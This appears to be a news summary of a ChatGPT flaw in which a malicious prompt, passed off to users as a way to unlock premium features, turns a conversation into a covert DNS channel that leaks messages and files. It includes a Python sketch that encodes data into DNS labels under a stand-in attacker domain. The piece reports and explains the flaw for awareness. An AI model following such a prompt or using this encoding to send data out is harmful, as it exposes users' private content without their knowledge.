
"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content."
"The vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated."
"An attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free."
A vulnerability in OpenAI ChatGPT enabled the exfiltration of sensitive user data through a hidden DNS-based communication channel. The flaw allowed malicious prompts to turn ordinary conversations into covert data leaks, bypassing existing safeguards. OpenAI addressed the issue on February 20, 2026, and found no evidence of exploitation. The vulnerability created a security blind spot because the AI system assumed the environment was isolated. Attackers could manipulate users into executing harmful prompts, especially within custom GPTs, amplifying the risk of data breaches.
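To illustrate why a DNS channel can leak data even when other network paths are blocked, here is a minimal Python sketch of the general technique: encoding content into DNS-safe subdomain labels so that merely resolving the names delivers the payload to whoever controls the parent domain. The domain name, chunking scheme, and function below are hypothetical illustrations of DNS tunneling in general, not details of the actual ChatGPT flaw.

```python
# Illustrative sketch only: how a DNS-based covert channel can carry data.
# "attacker.example" and the chunking scheme are hypothetical, not details
# of the specific vulnerability described in the article.
import base64
import textwrap


def encode_as_dns_labels(secret: str, domain: str = "attacker.example") -> list[str]:
    """Encode arbitrary text into DNS-safe labels under an attacker-controlled domain.

    A single DNS label is limited to 63 characters, so the base32 payload is
    split into chunks. Simply resolving these names would hand the data to
    whoever runs the authoritative name server for `domain`.
    """
    payload = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    chunks = textwrap.wrap(payload, 60)  # stay under the 63-character label limit
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]


if __name__ == "__main__":
    for name in encode_as_dns_labels("user uploaded file contents"):
        print(name)  # an exfiltrating agent would look these names up instead of printing them
```

Because DNS lookups are often treated as harmless infrastructure traffic, this kind of channel can slip past controls that only inspect HTTP requests, which is why an environment assumed to be isolated can still leak data.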
Read at The Hacker News